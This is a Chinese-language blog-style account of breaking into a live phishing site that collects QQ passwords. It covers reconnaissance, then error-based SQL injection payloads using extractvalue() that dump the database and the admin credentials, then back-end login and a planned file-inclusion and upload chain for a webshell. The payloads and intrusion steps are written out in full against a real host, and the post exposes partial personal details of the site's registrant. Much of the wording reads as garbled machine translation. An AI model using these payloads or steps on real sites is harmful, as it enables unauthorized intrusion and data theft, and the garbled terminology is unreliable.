1. 信息收集
一个阳光明媚的晚上,我们专业组的同事突然发来一个采集信息的二维码,说需要沫沫扫描并填写信息
像这些二维码,这些介绍,一看就知道不是什么好东西。 我闲来无事,就打算闯进去,就是为了这个小白练练手。 正如预期的那样。 这些假页面被不法分子用来收集信息,但不仅不能进入,而且忘记密码和注册新账户根本无法点击。 啊,太假了。 我不知道有多少人被杀。
这里我直接使用了一个信息采集网站,输入域名后手动采集挂qq网站源码,用nmap扫描。信息采集网站:TideFinger潮汐指纹 TideFinger潮汐指纹
操作系统:Linux(操作系统也可以直接改变域名中任意字母的大小写看网站响应,linux区分大小写会报错,windows不敏感)
中间件:nginx
前端语言:php
IP:45.xxx.xxx.xxx(日本)
开放端口:21/tcpopenftp
80/tcpopenhttp
888/tcpopenaccessbuilder
域名注册人邮箱:26618xxxxx@qq.com(去年搜索过广东,19岁)
目录扫描:2.rar(因为源码被盗所以下载了,这个就忽略吧,一波黑盒测试)
2. 漏洞发现
当我看到这个输入框时挂qq网站源码,我就想注入它。 其他的我不关心,只管尝试。 浏览器打开的代理是为了被burp拦截,而burp还没有响应,浏览器提示必须输入一个数字。 因此,确定是后端限制。
这里可以直接在浏览器f12中删除type="number"来绕过后端限制。 拿起burp拦截。
网站直接报错,响应头也提示为什么出错,并且直接暴露表和数组,而且debug也可能没有关闭。
直接错误注入,使用extractvalue()
(1)条件1:secure_file_priv无限制
(2)条件2:目录权限可读
(3)限制:extractvalue()函数最多可以读取32个字符
Payload: 'and(selectextractvalue(1,concat(0x7e,(selectdatabase())))) 直接拼接在u前面,数据库为w01
访问url/2.rar下载压缩包,解压发现是网站源码
发现w1是网站后台需要的账户密码
3. 漏洞
取出来就容易多了
数据库版本为5.6.50(information_schema保存了MySQL服务器所有数据库的信息。比如数据库名称,数据库的表(mysql5.0及以上),5.0以下只能猜测表的分段爆破命名)
检查数据库名称:u='and(selectextractvalue(1,concat(0x7e,(selectdatabase()))))
爆表名:u='and(selectextractvalue(1,concat(0x7e,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema=database()))))
突发数组名称: u='and(selectextractvalue(1,concat(0x7e,(selectgroup_concat(column_name)frominformation_schema.columnswheretable_name="TABLE_NAME"))))
突发数据: u='and(selectextractvalue(1,concat(0x7e,(selectgroup_concat(COIUMN_NAME)fromTABLE_NAME))))
由于前面的响应头注释已经暴露了表名和数组,所以也可以直接查看。 这是他们采集到的QQ号密码(因为extractvalue()函数最多可以读取32个字符,可以用limit来限制前面的输出,第一个数字代表从第一行数据开始输出,第二个数字代表输出几行数据)
有效负载: u='and(selectextractvalue(3,concat(0x7e,(selectuser_namefromcc_userslimit0,1))))#
爆破对应密码
有效负载: u='and(selectextractvalue(3,concat(0x7e,(selectuser_pswfromcc_userslimit0,1))))#
其实我是通过源码泄露直接收集了所有的表名
回到我们的源码,后台登录的地方,直接审计代码,发现后台账号的密码在cc_admins表上
错误注入炸毁了所有数组
负载: u='and(selectextractvalue(1,concat(0x7e,(selectcolumn_namefrominformation_schema.columnswheretable_name="cc_admins"limit0,1))))#(将 0 更改为 7,公开 8 个数组)
错误注入爆炸了对应数组的数据
有效负载: u='and(selectextractvalue(1,concat(0x7e,(selectf_userNamefromcc_adminslimit0,1))))#(更改数组值)
f_id、f_userPwd (e191919dd55cdcdcd55afaf0378da0505ff636363ff891891891cc746774677467a)、f_userName (admin)、f_groupid (1)、f_status (1)、f_tag (100)、f_psw (abcd1234 )、f_reg_time (1533386669)
用sqlmap运行不了,不知道为什么,只能自动注入
帐号:admin 密码:abcd1234。 成功进入后台,后台记录了被骗者的QQ、密码等重要信息。
这里获取网站绝对路径报错,而且mysql没有root权限,所以没办法插入一句木马获取webshell
审核代码后发现有备份王,但在网上搜索相关漏洞时并没有找到。
但是发现$mypath在文件/config/sbak/phomebak.php中是可控的,跟进代码
包含此 Ebak_BakExe 函数,但 mypath 上没有任何过滤处理。 我想到了截断之前的路径,这样上传带木马的图片就可以利用这个文件来包含漏洞,前提是先能找到备份王的账号密码。 没有办法直接跳过登录访问该页面。
正当我准备进行下一步时,他却跑了……
后台有地方可以上传文件,我也没有找过什么漏洞。
四。 概括
一半突然消失了。 首先,通过信息收集,泄露网站源代码并下载到源代码,发现网站后台路径。 之后,我通过网站收集qq密码的页面发现了错误注入,从而获取了后台账号和密码,并进入了后台。 通过源码审核,发现“备份王”的文件存在漏洞,收到后打算通过注入的方式获取“备份王”的账号和密码,然后就可以利用这个漏洞如果可能的话,在后台尝试文件上传漏洞。 两个孔配合在一起即可通向网络销售。 真可惜! 他逃跑了。 不再。
我不知道他收集qq和密码有什么目的。 现在登录qq需要手机验证,还有哪些其他平台密码可能被泄露。
